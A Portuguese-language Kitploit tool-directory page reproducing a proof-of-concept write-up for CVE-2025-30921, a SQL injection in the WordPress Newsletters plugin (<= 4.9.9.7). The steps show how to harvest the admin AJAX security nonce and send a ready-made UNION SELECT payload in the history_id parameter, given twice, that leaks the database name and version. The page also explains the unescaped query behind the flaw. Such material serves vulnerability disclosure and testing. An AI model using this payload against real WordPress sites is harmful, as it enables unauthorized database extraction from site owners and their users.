Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30921 — Prova de conceito do CVE-2025-30921 | Kitploit
Ferramentas/GitHubGitHub/dottak/cve-2025-30921
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubdottak/cve-2025-30921

CVE-2025-30921

Prova de conceito do CVE-2025-30921

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-30921

1️⃣ Tipo de componente

Plugin WordPress

2️⃣ Detalhes do componente

Nome do componente Newsletters

Versão vulnerável <= 4.9.9.7

Slug do componente newsletters-lite

Link do componente https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017: TOP 10

Classe de vulnerabilidade A3: Injeção

Tipo de vulnerabilidade Injeção de SQL

4️⃣ Pré-requisito

Administrador

5️⃣ Detalhes da vulnerabilidade

👉 Descrição breve

Ao visualizar o gráfico de visão geral das estatísticas no painel do plugin (/wp-admin/admin.php?page=newsletters) do plugin Newsletters versão 4.9.9.7 ou inferior, ocorre uma vulnerabilidade de Injeção de SQL devido à validação de entrada e processamento de escape insuficientes dos parâmetros de URL.

Por meio dessa vulnerabilidade, um atacante com privilégios de administrador pode explorá-la para extrair informações do banco de dados do site alvo.

👉 Como reproduzir (PoC)

  1. Prepare um site WordPress com o plugin Newsletters versão 4.9.9.7 ou inferior instalado.

  2. Navegue até o menu do painel do plugin Newsletters (/wp-admin/admin.php?page=newsletters).

    image

  3. Usando as ferramentas de desenvolvedor do navegador, pesquise por action=wpmlwelcomestats&security= na aba 'Elements' e verifique o valor de security. Por exemplo, se o resultado da pesquisa aparecer como mostrado abaixo, anote 22b1ac0de6.

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. Insira o valor de security anotado na seção <VALOR DE SEGURANÇA> do caminho de URL abaixo e envie uma solicitação para essa URL

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

👉 Informações adicionais (opcional)

[Causa raiz da vulnerabilidade]

Ao solicitar a URL onde ocorre a vulnerabilidade de Injeção de SQL no PoC acima, a função ajax_welcomestats dentro do arquivo /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php é chamada.

Nesse momento, o parâmetro de solicitação history_id é diretamente referenciado como uma cláusula de condição na string da consulta SQL e inicializado como a variável $history_condition. Essa variável é então passada para a consulta ao banco de dados sem qualquer processamento de escape.

image

Portanto, como não há validação ou processamento de escape para os valores inseridos no parâmetro de URL history_id, ocorre uma vulnerabilidade de Injeção de SQL. (Observe que os parâmetros de URL from e to também estão vulneráveis a ataques de Injeção de SQL devido à validação de entrada e processamento de escape insuficientes.)

6️⃣ Demonstração do exploit

video

7️⃣ Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921
Baixar ferramenta

Entre os parâmetros de URL, history_id contém o payload de Injeção de SQL, que permite consultar o nome do banco de dados (DATABASE()) e a versão (@@VERSION). Por exemplo, quando o valor de security é 22b1ac0de6, acesse a seguinte URL.

http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  • Ao verificar a resposta da solicitação à URL, você pode confirmar que o nome do banco de dados e as informações de versão são expostos devido à vulnerabilidade de Injeção de SQL por meio do parâmetro history_id.

    image